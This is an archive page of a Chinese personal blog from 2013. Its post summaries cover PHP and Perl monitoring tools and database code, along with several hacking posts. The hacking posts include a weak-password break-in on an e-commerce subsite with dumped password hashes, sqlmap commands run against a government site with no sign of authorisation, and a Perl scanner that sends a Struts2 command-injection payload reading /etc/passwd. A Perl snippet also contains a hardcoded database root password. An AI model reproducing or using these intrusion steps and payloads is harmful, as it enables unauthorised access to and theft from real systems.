07 2013 档案
摘要:今天在看某个电商站的时候,发现分站存在弱口令。。瞬间纠结了。。。database management system users password hashes: [*] blog [1]: password hash...
阅读全文
摘要:1.后台用户管理模块完善。2.修改用户列表里部分代码。3.完成查看信息页面代码。4.修改后台添加用户功能,与前台不一样。5.调整角色设置功能,添加修改角色页面,后面写代码。6.修改使用日志功能,后续添加用户操作记录。7.修改多个零星问题的代码,做了细微的调整。
阅读全文
摘要:今天在写一个小模块,找了下怎么转成JSON格式的数据。具体如下面代码:query("select * from web_jiankong");$row=$rows->fetch_assoc();echo json_encode($row);?>
阅读全文
摘要:今天测试查询数据的时候发现一个很奇异的问题,对着这个问题做了个研究。先看代码,具体如下:#!/usr/bin/perluse TDmodule;# create object$test=TDmodule->new();# connect db return config$config=$test->connect_db("3d_database","localhost","root","mojige123");# select for db return database$old=$test->s
阅读全文
摘要:package TDmodule;use DBI;sub new{ $self={}; $self->{select_db}=undef; $self->{delete_db}=undef; $self->{insert_db}=undef; $self->{update_db}=undef; bless $self; return $self;}sub connect_db{ my $self=shift; if(@_){ $self->{'connect_db'}=DBI->connect("DBI:mysql:database
阅读全文
摘要:优化了下程序,让它更加简单。。package TDmodule;use DBI;sub new{ $self={}; $self->{select_db}=undef; bless $self; return $self;}sub connect_db{ my $self=shift; if(@_){ $self->{'connect_db'}=DBI->connect("DBI:mysql:database=@_[0];host=@_[1]","@_[2]","@_[3]") or die &quo
阅读全文
摘要:经过zhong8解释,终于理解了。小试牛刀,写了个简化的数据库链接。package TDmodule;use DBI;sub new{ $self={}; $self->{username}=undef; $self->{password}=undef; $self->{host}=undef; $self->{database}=undef; $self->{connect_db}=[]; $self->{select_db}=undef; bless $self; return $self;}sub username{ my $self=shift; i
阅读全文
摘要:写得好纠结,目前不知道哪里有问题,还在研究。。package TDmodule;use DBI;sub new{ $self={}; $self->{username}=undef; $self->{password}=undef; $self->{host}=undef; $self->{database}=undef; $self->{connect_db}=[]; $self->{select_db}=undef; bless $self; return $self;}sub username{ my $self=shift; if(@_){ $sel
阅读全文
摘要:发现有个蛋疼的事情,还是没了解透。记录下已经研究出来的。package Person;use strict;sub new{ my $self = {}; $self->{name} =undef; $self->{age}=undef; bless($self); return $self;}sub name{ my $self=shift; if(@_){$self->{name}=shift}; return $self->{name};}sub age{ my $self=shift; if(@_){$self->{age}=shift}; return
阅读全文
摘要:周末在家没事干,突然想写算3d号码的计算器。但是没写完,因为有事情要忙。。先记录下,下午出去回来继续改。#!/usr/bin/perluse DBI;# 生成随机数字0-999$num=int(rand(999));# 查找已经出过奖的数字# 这个是已出过的中奖号码$old=read_db("select * from old_papar");# 这个是自己买的,且没中过的号码#$user=read_db("select * from new_papar");# 创建两个个哈希表%old_number=();%user_number=();print $
阅读全文
摘要:这东西真的很好用,今天好好的看了下。并且实践出真知,这东西的强大不是靠吹的。******************基本步骤***************sqlmap -u "http://news.hackworry.com/news?id=1" --current-user #获取当前用户名称sqlmap -u "http://news.hackworry.com/news?id=1" --current-db #获取当前数据库名称sqlmap -u "http://news.hackworry.com/news?id=1" --ta
阅读全文
摘要:这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。 2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10 2006 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10 2007 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user"
阅读全文
摘要:今天逛的时候发现的,就此转下:1、一个网站基本的安全措施有哪些?答:1)服务器管理权,包括服务器是否容易被被盗,服务器是否能让人随意插拔网线,服务器网关是否可以由别人随意控制 2)shell权限管理,如何登录服务器管理,必须本地登录,或者可以远程登录,或者通过vpn或者防火墙控制登录。 3)数据库管理,只允许本地登录,也允许远程登录,是否有ip限制。 4)网站软件运行的用户是否是root,能否随意读取服务器上的文件 5)代码中是否有sql注入,xss攻击的可能 6)OS是否有漏洞或者后门 7)DNS是否安全 8)是否有arp攻击2、一个网站的用户数据库被入侵的方式有哪些? 1)代码中有s...
阅读全文
摘要:1.将用户密码以MD5加密.2.修改密码处也改成MD5的.3.后台建立,开始写后台模块。4.完成后台个人信息查看、管理修改密码模块。5.完成后台用户列表查看模块。6.调整了后台主页面CSS和框架.
阅读全文
摘要:1.更新了协助申请的代码,添加了上传图片功能.2.试验前面的功能,并做一些改动。3.Perl守护脚本添加了日志记录功能。
阅读全文
摘要:手贱写了个批量测试的。。昨天要测几个东西。。#!/usr/bin/perluse HTTP::Request;use LWP::UserAgent;use threads;use Thread::Semaphore;use Socket;while(){ Webscan($_);}sub Webscan{ local($scan_url)=shift; $tmp=$scan_url .'?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/pa
阅读全文
摘要:目前基本上功能都实现了,还存在以下几个功能未完善:1.报告功能模块,报告导出。2.上传文件功能。后续可能会继续开发的是后台管理功能,包含在线修改代码。
阅读全文
摘要:1.由于GIT服务器问题,导致部分文件丢失,重新上传。2.更新列表文件,monitor_list.php跳转问题.3.添加了page_function.php准备调整代码。4.修改了分页的代码,提高代码复用.(monitor_list.php help_list.php monitor_report.php)5.修改了数据库web_help表的设计,添加了图片字段.6.增加了协助申请功能,添加表单。7.修改了多个文件,减少了部分重复代码。
阅读全文
摘要:用代理然后访问:http://www.tenable.com/products/nessus/nessus-homefeed
阅读全文
摘要:1.修改了报告管理里面的查看报告、导出报告功能。2.增加了两个文件:report_export.php,report_view.php3.完成系统管理中的投诉建议模块4.创建了web_proposal数据表,用于投诉建议模块.5.创建了proposal_add.php文件,用于数据校验和提交.6.删除了一些不相关的临时文件、测试文件等。7.调整了一下文件的名称,规范命名规则。8.更新了协助列表页面,后续填充代码。9.增加了协助的数据表web_help。10.修复了monitor_del.php页面一些跳转错误.
阅读全文
摘要:今天更新了部分地方,在Monitor上调整了一下代码,以及添加了INC文件夹,这是我之前没注意遗漏的部分。今天全部PUSH上去了。= =#还在目录下添加了read.txt 作为使用说明。增加了一条测试数据在sql当中。
阅读全文
摘要:折腾了好半天,终于解决了这个BUG。 53 sudo apt-get install fcitx fcitx-googlepinyin 54 im-switch -s fcitx -z default
阅读全文
摘要:欢迎给我更多的建议和指点。谢谢。。QQ:505575655 Email:tangyucong@163.com这个子平台的介绍:主要组成的部分有Bootstrap为前端,PHP为后端,Perl作为底层的小工具在定时任务当中跑。(后续可能会改变,例如改成可以不需要crontab就能实现定时计划)数据库采用的是mysql的数据库。当然你可以改成你喜欢的oracle,我并不反对,但是在Perl代码上需要进行部分的修改。(你也可以写成oracle版本的,不反对 ^+^)在PHP代码当中肯定有很多漏洞,那是因为我根本没做任何过滤。目前的阶段属于先实现功能再考虑别的问题,请你谅解。代码完全是code-php
阅读全文
摘要:今天因为要搭建一个环境,无意之中发现一个BUG。当在设置主机名的时候,如果你输入错误的时候,默认的情况下会自动填充一些别的东西,例如后面的代码。具体情况如下:在12.04中发现该问题存在。= = # 怎么利用具体没细研究。。
阅读全文
浙公网安备 33010602011771号